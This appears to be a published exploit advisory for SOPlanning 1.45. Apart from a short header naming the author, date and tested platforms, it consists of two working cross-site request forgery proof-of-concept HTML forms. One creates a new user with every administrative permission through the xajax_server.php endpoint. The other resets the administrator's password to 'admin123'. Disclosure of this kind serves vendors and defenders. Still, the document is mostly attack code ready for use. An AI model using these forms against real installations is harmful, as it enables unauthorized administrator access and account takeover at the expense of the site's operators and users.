Share
# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User)  
# Date: 2020-02-14  
# Exploit Author: J3rryBl4nks  
# Vendor Homepage: https://www.soplanning.org/en/  
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/  
# Version 1.45  
# Tested on Windows 10/Kali Rolling  
  
# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary   
# user creation and for changing passwords (Specifically the admin password)  
  
# POC For aribtrary user creation:  
# CSRF POC:  
  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">  
<input type="hidden" name="xajax" value="submitFormUser" />  
<input type="hidden" name="xajaxr" value="1581700271752" />  
<input type="hidden" name="xajaxargs[]" value="Testing" />  
<input type="hidden" name="xajaxargs[]" value="" />  
<input type="hidden" name="xajaxargs[]" value="1" />  
<input type="hidden" name="xajaxargs[]" value="Testing" />  
<input type="hidden" name="xajaxargs[]" value="test@test.com" />  
<input type="hidden" name="xajaxargs[]" value="Test" />  
<input type="hidden" name="xajaxargs[]" value="test" />  
<input type="hidden" name="xajaxargs[]" value="true" />  
<input type="hidden" name="xajaxargs[]" value="#FFFFFF" />  
<input type="hidden" name="xajaxargs[]" value="false" />  
<input type="hidden" name="xajaxargs[]" value="false" />  
<input type="hidden" name="xajaxargs[]" value="<xjxobj><e><k>0</k><v>users_manage_all</v></e><e><k>1</k><v>projects_manage_all</v></e><e><k>2</k><v>projectgroups_manage_all</v></e><e><k>3</k><v>tasks_modify_all</v></e><e><k>4</k><v>tasks_view_all_projects</v></e><e><k>5</k><v>tasks_view_all_users</v></e><e><k>6</k><v>lieux_all</v></e><e><k>7</k><v>ressources_all</v></e><e><k>8</k><v>audit_restore</v></e><e><k>9</k><v>parameters_all</v></e><e><k>10</k><v>stats_users</v></e><e><k>11</k><v>stats_projects</v></e></xjxobj>" />  
<input type="hidden" name="xajaxargs[]" value="" />  
<input type="hidden" name="xajaxargs[]" value="" />  
<input type="hidden" name="xajaxargs[]" value="" />  
<input type="hidden" name="xajaxargs[]" value="" />  
<input type="hidden" name="xajaxargs[]" value="" />  
<input type="hidden" name="xajaxargs[]" value="true" />  
<input type="hidden" name="xajaxargs[]" value="<xjxobj></xjxobj>" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
# POC for admin password change:  
  
# CSRF POC:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST">  
<input type="hidden" name="xajax" value="submitFormProfil" />  
<input type="hidden" name="xajaxr" value="1581702103306" />  
<input type="hidden" name="xajaxargs[]" value="ADM" />  
<input type="hidden" name="xajaxargs[]" value="test@test.com" />  
<input type="hidden" name="xajaxargs[]" value="admin123" />  
<input type="hidden" name="xajaxargs[]" value="fr" />  
<input type="hidden" name="xajaxargs[]" value="false" />  
<input type="hidden" name="xajaxargs[]" value="false" />  
<input type="hidden" name="xajaxargs[]" value="true" />  
<input type="hidden" name="xajaxargs[]" value="true" />  
<input type="hidden" name="xajaxargs[]" value="true" />  
<input type="hidden" name="xajaxargs[]" value="false" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>